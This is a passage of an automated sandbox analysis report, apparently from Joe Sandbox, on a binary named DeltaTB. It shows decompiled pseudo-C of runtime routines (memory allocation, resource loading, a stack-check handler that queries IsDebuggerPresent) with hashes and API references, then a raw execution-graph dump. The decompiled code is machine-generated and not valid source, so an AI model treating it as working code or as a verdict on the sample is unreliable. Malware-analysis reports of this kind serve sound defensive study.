                                                                                                                                                              • Instruction Fuzzy Hash: 1E01F9326146616BD7105639CC01BBBB38C9FD3351F044615B556D31C0EB78EC8486E6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A12E1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 223 9a12e1-9a131f call 9a3c21 226 9a135d-9a136f call 9a3bc5 223->226 227 9a1321-9a1327 223->227 229 9a1334-9a1338 227->229 230 9a133a-9a1342 229->230 231 9a1329-9a132d 229->231 233 9a134a-9a1350 call 9a121f 230->233 234 9a1344-9a1349 230->234 231->230 235 9a132f-9a1330 231->235 237 9a1355-9a135b 233->237 234->233 235->229 237->226 237->227
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E009A12E1(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				intOrPtr _v544;
				void* __esi;
				short* _t27;
				short* _t28;
				intOrPtr _t29;
				short* _t35;
				intOrPtr _t36;
				signed int _t38;
				intOrPtr _t39;
				signed int _t40;
				signed int _t42;
				signed int _t43;
				signed int _t48;

				_t36 = __edi;
				_t29 = __ebx;
				_t42 = (_t40 & 0xfffffff8) - 0x21c;
				_v8 =  *0x9a5000 ^ _t42;
				_v544 = __ecx;
				E009A3C21( &_v540, _a4, 0x104);
				_t25 = 0;
				_t43 = _t42 + 0xc;
				_t38 = 0;
				if(_v540 != 0) {
					do {
						_t27 = _t43 + 8 + _t38 * 2;
						_t35 = _t27;
						while( *_t27 != 0) {
							__eflags =  *_t27 - 0x3b;
							if(__eflags != 0) {
								_t38 = _t38 + 1;
								__eflags = _t38;
								_t27 = _t43 + 8 + _t38 * 2;
								continue;
							}
							goto L5;
						}
						L5:
						_t28 = _t43 + 8 + _t38 * 2;
						if( *_t28 == 0x3b) {
							 *_t28 = 0;
							_t38 = _t38 + 1;
							_t48 = _t38;
						}
						_t25 = E009A121F(_t29, _t35, _t48, _v544); // executed
					} while ( *((short*)(_t43 + 8 + _t38 * 2)) != 0);
				}
				_pop(_t39);
				return E009A3BC5(_t25, _t29, _v8 ^ _t43, _t35, _t36, _t39);
			}


















                                                                                                                                                              0x009a12e1
                                                                                                                                                              0x009a12e1
                                                                                                                                                              0x009a12e7
                                                                                                                                                              0x009a12f4
                                                                                                                                                              0x009a130a
                                                                                                                                                              0x009a130e
                                                                                                                                                              0x009a1313
                                                                                                                                                              0x009a1315
                                                                                                                                                              0x009a1318
                                                                                                                                                              0x009a131f
                                                                                                                                                              0x009a1321
                                                                                                                                                              0x009a1321
                                                                                                                                                              0x009a1325
                                                                                                                                                              0x009a1334
                                                                                                                                                              0x009a1329
                                                                                                                                                              0x009a132d
                                                                                                                                                              0x009a132f
                                                                                                                                                              0x009a132f
                                                                                                                                                              0x009a1330
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1330
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a132d
                                                                                                                                                              0x009a133a
                                                                                                                                                              0x009a133a
                                                                                                                                                              0x009a1342
                                                                                                                                                              0x009a1346
                                                                                                                                                              0x009a1349
                                                                                                                                                              0x009a1349
                                                                                                                                                              0x009a1349
                                                                                                                                                              0x009a1350
                                                                                                                                                              0x009a1355
                                                                                                                                                              0x009a1321
                                                                                                                                                              0x009a1364
                                                                                                                                                              0x009a136f

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsncpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1735881322-0
                                                                                                                                                              • Opcode ID: bf9389737f1818ef4ccc242f74773e80caaf7248216940c4da2c6a281e6a61e2
                                                                                                                                                              • Instruction ID: 5f32fcf5e5a22548c134a5e574f0af033a1a164da44927a2e8e272db41662555
                                                                                                                                                              • Opcode Fuzzy Hash: bf9389737f1818ef4ccc242f74773e80caaf7248216940c4da2c6a281e6a61e2
                                                                                                                                                              • Instruction Fuzzy Hash: DE019E309043049BCB20FF64D845AABB3E8EB96350F448D2AE98A87590EB70D984C7D2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A17BC Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 238 9a17bc-9a17c1 239 9a17c3-9a17cb VirtualFree 238->239 240 9a17d1-9a17dc 238->240 239->240
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E009A17BC(signed int* __esi) {
				void* _t6;
				signed int* _t7;

				_t7 = __esi;
				_t6 = __esi[2];
				if(_t6 != 0) {
					_t6 = VirtualFree(_t6, 0, 0x8000); // executed
				}
				_t7[2] = _t7[2] & 0x00000000;
				_t7[1] = _t7[1] & 0x00000000;
				 *_t7 =  *_t7 & 0x00000000;
				return _t6;
			}





                                                                                                                                                              0x009a17bc
                                                                                                                                                              0x009a17bc
                                                                                                                                                              0x009a17c1
                                                                                                                                                              0x009a17cb
                                                                                                                                                              0x009a17cb
                                                                                                                                                              0x009a17d1
                                                                                                                                                              0x009a17d5
                                                                                                                                                              0x009a17d9
                                                                                                                                                              0x009a17dc

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000,009A107A,?,?,?,?,?,?,009A1603), ref: 009A17CB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                              • Opcode ID: 2c120756f889692611642ea6b155607eff33d879ac8f50b9e4c32ef83c48d6a3
                                                                                                                                                              • Instruction ID: 841483a016d4f9301ad30fe8fde681166b5a6a262fef00e0383343b8d21c7cc4
                                                                                                                                                              • Opcode Fuzzy Hash: 2c120756f889692611642ea6b155607eff33d879ac8f50b9e4c32ef83c48d6a3
                                                                                                                                                              • Instruction Fuzzy Hash: 2CD0EA71660B029FEB208F12DC89B26B3E8BB51B27F65880CA1A6958D1D7B8E4449A54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A2236 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 241 9a2236-9a223b 242 9a223d-9a223f 241->242 243 9a2240-9a2253 VirtualAlloc 241->243
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E009A2236(long _a4) {
				void* _t3;

				if(_a4 != 0) {
					_t3 = VirtualAlloc(0, _a4, 0x1000, 4); // executed
					return _t3;
				} else {
					return 0;
				}
			}




                                                                                                                                                              0x009a223b
                                                                                                                                                              0x009a224d
                                                                                                                                                              0x009a2253
                                                                                                                                                              0x009a223d
                                                                                                                                                              0x009a223f
                                                                                                                                                              0x009a223f

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,009A1863,00000000,?,?), ref: 009A224D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              • Opcode ID: ee38e28ebc7a005db216de03edbf97a947a01c91fb42015531c5a021d218e411
                                                                                                                                                              • Instruction ID: e13c11b749727965004262ba7fe4d102f476e2a6cea3ab3933cba74fc82cf67d
                                                                                                                                                              • Opcode Fuzzy Hash: ee38e28ebc7a005db216de03edbf97a947a01c91fb42015531c5a021d218e411
                                                                                                                                                              • Instruction Fuzzy Hash: 7EC09B70799300BFEF554B548E06B8577919BC5B57F10C454F358544D4C7F45444F646
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A23AB Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 244 9a23ab-9a23bc VirtualFree
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E009A23AB(void* _a8) {
				int _t2;

				_t2 = VirtualFree(_a8, 0, 0x8000); // executed
				return _t2;
			}




                                                                                                                                                              0x009a23b6
                                                                                                                                                              0x009a23bc

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 009A23B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                              • Opcode ID: 69a7564585ec807b9ac53d081bc9ae49e458d0e9f36a2bfca4fc906c4d16bbc2
                                                                                                                                                              • Instruction ID: be8edee0c03849f073cc7b1555a109656488ac1775f6cd2cad4c8849ade9a391
                                                                                                                                                              • Opcode Fuzzy Hash: 69a7564585ec807b9ac53d081bc9ae49e458d0e9f36a2bfca4fc906c4d16bbc2
                                                                                                                                                              • Instruction Fuzzy Hash: E3A001306A8751ABEE619F10AD0AB097B61BB81B01F208854B2A1690E08BA16418AA4A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 009A3BC5 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E009A3BC5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				if(__ecx ==  *0x9a5000) {
					asm("repe ret");
				}
				 *0x9a5118 = _t6;
				 *0x9a5114 = _t22;
				 *0x9a5110 = _t25;
				 *0x9a510c = _t21;
				 *0x9a5108 = _t27;
				 *0x9a5104 = _t26;
				 *0x9a5130 = ss;
				 *0x9a5124 = cs;
				 *0x9a5100 = ds;
				 *0x9a50fc = es;
				 *0x9a50f8 = fs;
				 *0x9a50f4 = gs;
				asm("pushfd");
				_pop( *0x9a5128);
				 *0x9a511c =  *_t31;
				 *0x9a5120 = _v0;
				 *0x9a512c =  &_a4;
				 *0x9a5068 = 0x10001;
				 *0x9a501c =  *0x9a5120;
				 *0x9a5010 = 0xc0000409;
				 *0x9a5014 = 1;
				_v812 =  *0x9a5000;
				_v808 =  *0x9a5004;
				 *0x9a5060 = IsDebuggerPresent();
				_push(1);
				E009A3DC2(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x9a409c);
				if( *0x9a5060 == 0) {
					_push(1);
					E009A3DC2(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}















                                                                                                                                                              0x009a3bc5
                                                                                                                                                              0x009a3bc5
                                                                                                                                                              0x009a3bc5
                                                                                                                                                              0x009a3bc5
                                                                                                                                                              0x009a3bc5
                                                                                                                                                              0x009a3bc5
                                                                                                                                                              0x009a3bcb
                                                                                                                                                              0x009a3bcd
                                                                                                                                                              0x009a3bcd
                                                                                                                                                              0x009a3cc7
                                                                                                                                                              0x009a3ccc
                                                                                                                                                              0x009a3cd2
                                                                                                                                                              0x009a3cd8
                                                                                                                                                              0x009a3cde
                                                                                                                                                              0x009a3ce4
                                                                                                                                                              0x009a3cea
                                                                                                                                                              0x009a3cf1
                                                                                                                                                              0x009a3cf8
                                                                                                                                                              0x009a3cff
                                                                                                                                                              0x009a3d06
                                                                                                                                                              0x009a3d0d
                                                                                                                                                              0x009a3d14
                                                                                                                                                              0x009a3d15
                                                                                                                                                              0x009a3d1e
                                                                                                                                                              0x009a3d26
                                                                                                                                                              0x009a3d2e
                                                                                                                                                              0x009a3d39
                                                                                                                                                              0x009a3d48
                                                                                                                                                              0x009a3d4d
                                                                                                                                                              0x009a3d57
                                                                                                                                                              0x009a3d66
                                                                                                                                                              0x009a3d71
                                                                                                                                                              0x009a3d7d
                                                                                                                                                              0x009a3d82
                                                                                                                                                              0x009a3d84
                                                                                                                                                              0x009a3d8c
                                                                                                                                                              0x009a3d97
                                                                                                                                                              0x009a3da4
                                                                                                                                                              0x009a3da6
                                                                                                                                                              0x009a3da8
                                                                                                                                                              0x009a3dad
                                                                                                                                                              0x009a3dc1

                                                                                                                                                              APIs
                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 009A3D77
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009A3D8C
                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(009A409C), ref: 009A3D97
                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 009A3DB3
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 009A3DBA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                              • Opcode ID: 0eaeac21a4e7949fb31cc773fd5ad289d3b9c1bfadd8572015b023e65025f6c4
                                                                                                                                                              • Instruction ID: 501ad9fbd372bc51bb39696068a411a626bfad711a8b93d3bb39daf8c677dada
                                                                                                                                                              • Opcode Fuzzy Hash: 0eaeac21a4e7949fb31cc773fd5ad289d3b9c1bfadd8572015b023e65025f6c4
                                                                                                                                                              • Instruction Fuzzy Hash: 4921F074A3CA24EFC740DF24E8457687BA4FF4B304F828059E50987261E3B09A85EFD5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A1B44 Relevance: 4.5, APIs: 3, Instructions: 24COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E009A1B44(struct HINSTANCE__* _a4, intOrPtr* _a8, intOrPtr* _a12, struct HRSRC__* _a16) {
				void* _t14;

				_t14 = LoadResource(_a4, _a16);
				if(_t14 == 0) {
					return 0x716;
				}
				 *_a12 = SizeofResource(_a4, _a16);
				 *_a8 = LockResource(_t14);
				return 0;
			}




                                                                                                                                                              0x009a1b54
                                                                                                                                                              0x009a1b58
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1b7b
                                                                                                                                                              0x009a1b6a
                                                                                                                                                              0x009a1b75
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • LoadResource.KERNEL32(?,?,?,?,009A1045,?,?,?,00000000,?,?,?,?,?,009A1603), ref: 009A1B4E
                                                                                                                                                              • SizeofResource.KERNEL32(?,?,?,009A1045,?,?,?,00000000,?,?,?,?,?,009A1603), ref: 009A1B60
                                                                                                                                                              • LockResource.KERNEL32(00000000,?,009A1045,?,?,?,00000000,?,?,?,?,?,009A1603), ref: 009A1B6C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Resource$LoadLockSizeof
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2853612939-0
                                                                                                                                                              • Opcode ID: a60149f7bcdefe025208442160ee6d64d5c31cb68d3c61402da33bd85fc05cd9
                                                                                                                                                              • Instruction ID: a2f9e0b95926f51ff3c82b936627f1cb4b1581c91d95d40c9d1abc528f2a43f6
                                                                                                                                                              • Opcode Fuzzy Hash: a60149f7bcdefe025208442160ee6d64d5c31cb68d3c61402da33bd85fc05cd9
                                                                                                                                                              • Instruction Fuzzy Hash: A1E01236516129EFCB119F64DD5489A7F75EF4A390B014465FE099B320D771D810EFE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A154E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E009A154E(void* __edi) {
				intOrPtr _v4;
				signed int _t11;
				void* _t12;
				signed short* _t13;

				_t12 = __edi;
				_t13 =  *((intOrPtr*)(__edi + 0x38))();
				if(_t13 != 0) {
					while(1) {
						_t11 =  *_t13 & 0x0000ffff;
						if(_t11 == 0x20 || _t11 == 0x2f || _t11 == 0x2d) {
							goto L5;
						}
						_t13 =  &(_t13[1]);
						if(_t13 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				E009A3C02(_v4, E009A14DC(_t12, L"CommandLine"));
				E009A3BD4(_v4, " ");
				E009A3BD4(_v4, _t13);
				return 0;
			}







                                                                                                                                                              0x009a154e
                                                                                                                                                              0x009a1552
                                                                                                                                                              0x009a1556
                                                                                                                                                              0x009a1558
                                                                                                                                                              0x009a1558
                                                                                                                                                              0x009a155f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a156e
                                                                                                                                                              0x009a156f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a156f
                                                                                                                                                              0x009a1558
                                                                                                                                                              0x009a1571
                                                                                                                                                              0x009a1581
                                                                                                                                                              0x009a158f
                                                                                                                                                              0x009a1599
                                                                                                                                                              0x009a15a4

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcscat$_wcscpy
                                                                                                                                                              • String ID: CommandLine
                                                                                                                                                              • API String ID: 1832442500-3253501508
                                                                                                                                                              • Opcode ID: b129a49fb17cda45a3e2543e7a7beb14cd044c8e1aafb511fd7e688c02b2ea7c
                                                                                                                                                              • Instruction ID: b558ea7b0bda545cdd0d0469fd2faa6860c5ea73d6a9a95f63225905000151d8
                                                                                                                                                              • Opcode Fuzzy Hash: b129a49fb17cda45a3e2543e7a7beb14cd044c8e1aafb511fd7e688c02b2ea7c
                                                                                                                                                              • Instruction Fuzzy Hash: BDE02B74C081312B972137184C07EBFB558DFE3760F809920FCC160065E6208D6341D2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:13.6%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:1.4%
                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                              Total number of Limit Nodes:69
                                                                                                                                                              execution_graph 35680 452c54 35681 452c60 _realloc 35680->35681 35682 452c75 35681->35682 35683 452c67 35681->35683 35684 452c7c 35682->35684 35685 452c88 35682->35685 35686 44fbd9 _malloc 69 API calls 35683->35686 35687 44fafc ___free_lc_time 69 API calls 35684->35687 35692 452dfa 35685->35692 35716 452c95 _realloc ___sbh_resize_block ___sbh_find_block 35685->35716 35702 452c6f _realloc 35686->35702 35687->35702 35688 452e2d 35726 456ffc 7 API calls __decode_pointer 35688->35726 35689 457dfc __lock 69 API calls 35689->35716 35691 452dff HeapReAlloc 35691->35692 35691->35702 35692->35688 35692->35691 35694 452e51 35692->35694 35699 452e47 35692->35699 35725 456ffc 7 API calls __decode_pointer 35692->35725 35693 452e33 35727 454477 69 API calls __getptd_noexit 35693->35727 35694->35702 35729 454477 69 API calls __getptd_noexit 35694->35729 35698 452e5a GetLastError 35698->35702 35728 454477 69 API calls __getptd_noexit 35699->35728 35703 452dc8 35703->35702 35705 452dcd GetLastError 35703->35705 35704 452d20 HeapAlloc 35710 452d1a _realloc 35704->35710 35704->35716 35705->35702 35706 452d75 HeapReAlloc 35706->35716 35708 452de0 35708->35702 35724 454477 69 API calls __getptd_noexit 35708->35724 35710->35704 35710->35716 35720 457e5f __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 35710->35720 35713 452dc3 35723 454477 69 API calls __getptd_noexit 35713->35723 35714 452ded 35714->35698 35714->35702 35716->35688 35716->35689 35716->35702 35716->35704 35716->35706 35716->35708 35716->35710 35716->35713 35718 45860e 5 API calls 2 library calls 35716->35718 35719 457e5f __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 35716->35719 35721 452d98 LeaveCriticalSection __freefls@4 35716->35721 35722 456ffc 7 API calls __decode_pointer 35716->35722 35718->35716 35719->35716 35720->35710 35721->35716 35722->35716 35723->35703 35724->35714 35725->35692 35726->35693 35727->35702 35728->35703 35729->35698 35758 422f50 35759 422f57 35758->35759 35759->35759 35760 422f5f RegDeleteValueW 35759->35760 32344 424000 32345 424056 32344->32345 32346 42402c 32344->32346 32350 4ee220 32346->32350 32349 44fae5 _Immortalize 76 API calls 32349->32345 32351 4ee254 _Immortalize 32350->32351 32352 4175c0 _Immortalize 69 API calls 32351->32352 32353 4ee2f9 32352->32353 32356 425ae0 32353->32356 32357 425b13 _Immortalize 32356->32357 32360 426830 32357->32360 32361 426861 _Immortalize 32360->32361 32362 42404c 32360->32362 32363 426875 32361->32363 32364 42686e 32361->32364 32362->32349 32368 41a5c0 77 API calls allocator 32363->32368 32367 427030 77 API calls 3 library calls 32364->32367 32367->32362 32368->32362 32369 423c00 32370 44f76f _Allocate 77 API calls 32369->32370 32371 423c2f 32370->32371 32372 423c62 32371->32372 32382 423cd0 77 API calls 2 library calls 32371->32382 32374 423c91 32372->32374 32375 423c87 32372->32375 32379 41a080 32374->32379 32383 422600 CloseHandle SetThreadPriority CoUninitialize 32375->32383 32378 423c8f 32384 451fc6 32379->32384 32382->32372 32383->32378 32385 451ff6 32384->32385 32386 451fda 32384->32386 32405 457212 TlsGetValue 32385->32405 32440 454477 69 API calls __getptd_noexit 32386->32440 32390 451fdf 32441 4557a5 7 API calls 2 library calls 32390->32441 32394 45205a 32396 44fafc ___free_lc_time 69 API calls 32394->32396 32397 452060 32396->32397 32399 41a0a7 32397->32399 32442 45449d 69 API calls 3 library calls 32397->32442 32399->32378 32402 45201e CreateThread 32402->32399 32404 452051 GetLastError 32402->32404 32498 451f43 32402->32498 32404->32394 32406 457227 32405->32406 32407 451ffc 32405->32407 32408 457177 __decode_pointer 7 API calls 32406->32408 32410 457789 32407->32410 32409 457232 TlsSetValue 32408->32409 32409->32407 32413 457792 32410->32413 32412 452008 32412->32394 32416 457400 32412->32416 32413->32412 32414 4577b0 Sleep 32413->32414 32443 45d90b 32413->32443 32415 4577c5 32414->32415 32415->32412 32415->32413 32461 457387 GetLastError 32416->32461 32418 457408 32420 452015 32418->32420 32475 457948 69 API calls 3 library calls 32418->32475 32421 4572a0 32420->32421 32476 456860 32421->32476 32423 4572ac GetModuleHandleW 32424 4572c3 32423->32424 32425 4572bc 32423->32425 32427 4572fe 32424->32427 32428 4572da GetProcAddress GetProcAddress 32424->32428 32495 457918 Sleep GetModuleHandleW 32425->32495 32430 457dfc __lock 65 API calls 32427->32430 32428->32427 32429 4572c2 32429->32424 32431 45731d InterlockedIncrement 32430->32431 32477 457375 32431->32477 32434 457dfc __lock 65 API calls 32435 45733e 32434->32435 32480 45af05 InterlockedIncrement 32435->32480 32437 45735c 32492 45737e 32437->32492 32439 457369 _realloc 32439->32402 32440->32390 32442->32399 32444 45d917 _realloc 32443->32444 32445 45d92f 32444->32445 32455 45d94e _memset 32444->32455 32456 454477 69 API calls __getptd_noexit 32445->32456 32447 45d934 32457 4557a5 7 API calls 2 library calls 32447->32457 32449 45d9c0 RtlAllocateHeap 32449->32455 32450 45d944 _realloc 32450->32413 32452 457dfc __lock 68 API calls 32452->32455 32455->32449 32455->32450 32455->32452 32458 45860e 5 API calls 2 library calls 32455->32458 32459 45da07 LeaveCriticalSection __freefls@4 32455->32459 32460 456ffc 7 API calls __decode_pointer 32455->32460 32456->32447 32458->32455 32459->32455 32460->32455 32462 457212 ___set_flsgetvalue 9 API calls 32461->32462 32463 45739e 32462->32463 32464 4573f4 SetLastError 32463->32464 32465 457789 __calloc_crt 66 API calls 32463->32465 32464->32418 32466 4573b2 32465->32466 32466->32464 32467 457177 __decode_pointer 7 API calls 32466->32467 32468 4573cc 32467->32468 32469 4573d3 32468->32469 32470 4573eb 32468->32470 32471 4572a0 __initptd 66 API calls 32469->32471 32472 44fafc ___free_lc_time 66 API calls 32470->32472 32473 4573db GetCurrentThreadId 32471->32473 32474 4573f1 32472->32474 32473->32464 32474->32464 32475->32420 32476->32423 32496 457d22 LeaveCriticalSection 32477->32496 32479 457337 32479->32434 